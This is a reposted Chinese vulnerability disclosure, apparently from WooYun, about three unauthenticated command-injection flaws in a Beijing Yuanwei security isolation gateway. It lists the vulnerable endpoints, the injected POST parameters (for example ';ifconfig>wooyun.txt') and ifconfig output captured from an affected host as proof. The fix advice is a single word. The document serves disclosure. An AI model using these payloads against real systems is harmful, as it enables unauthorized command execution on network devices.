神刀安全网

北京远为安全隔离网关三处命令执行漏洞(无需登录)

简要描述:

北京远为安全隔离网关三处命令执行漏洞(无需登录)

详细说明:

官方网站:http://**.**.**.**/

北京远为软件有限公司(以下简称:远为软件)是一家云计算时代安全的虚拟化产品及解决方案提供商,公司历经十年技术积淀,于2007年开始市场化进程。远为软件的核心团队来源于国内外虚拟化和信息安全领域的专家,深谙云计算时代虚拟化背景下信息安全的技术发展方向,致力于将远为软件打造成为中国虚拟化技术第一品牌,民族基础软件的国际品牌。

经测试发现该系统存在任意命令执行漏洞:

code 区域
/highconfig/ha.php post: name=test*;ifconfig>wooyun.txt
/highconfig/ha_old.php post: ok=1&float_ip=wooyun;id>wooyun.txt
/highconfig/hot.php post: hand=1&localip=wooyun;ifconfig>wooyun.txt

漏洞poc

直接访问:

**.**.**.**:8888/highconfig/ha.php 并post提交即可:

code 区域
**.**.**.**:8888/highconfig/ha.php
name=test*;ifconfig>wooyun.txt
code 区域
**.**.**.**:8888/highconfig/wooyun.txt
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=19b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,TSO4>
ether 00:0d:48:cd:56:dd
inet **.**.**.** netmask 0xffffff00 broadcast **.**.**.**
media: Ethernet autoselect (1000baseT <full-duplex>)
status: active
em1: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=19b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,TSO4>
ether 00:0d:48:cd:56:dc
inet **.**.**.** netmask 0x80000000 broadcast **.**.**.**
media: Ethernet autoselect (1000baseT <full-duplex>)
status: active
em2: flags=8802<BROADCAST,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=19b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,TSO4>
ether 00:0d:48:cd:56:db
media: Ethernet autoselect
status: no carrier

其他两处漏洞类似,均可以直接执行任意命令。

漏洞案例:

code 区域
**.**.**.**:8888/dl.html
**.**.**.**:8888/dl.html
**.**.**.**:8888/dl.html
**.**.**.**:8888/dl.html
**.**.**.**:8888/dl.html
**.**.**.**:8888/dl.html

漏洞证明:

code 区域
**.**.**.**:8888/highconfig/wooyun.txt
em0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=19b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,TSO4>
ether 00:0d:48:cd:56:dd
inet **.**.**.** netmask 0xffffff00 broadcast **.**.**.**
media: Ethernet autoselect (1000baseT <full-duplex>)
status: active
em1: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=19b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,TSO4>
ether 00:0d:48:cd:56:dc
inet **.**.**.** netmask 0x80000000 broadcast **.**.**.**
media: Ethernet autoselect (1000baseT <full-duplex>)
status: active
em2: flags=8802<BROADCAST,SIMPLEX,MULTICAST> metric 0 mtu 1500
options=19b<RXCSUM,TXCSUM,VLAN_MTU,VLAN_HWTAGGING,VLAN_HWCSUM,TSO4>
ether 00:0d:48:cd:56:db
media: Ethernet autoselect
status: no carrier

修复方案:

过滤

版权声明:神刀安全网转自 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 北京远为安全隔离网关三处命令执行漏洞(无需登录)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮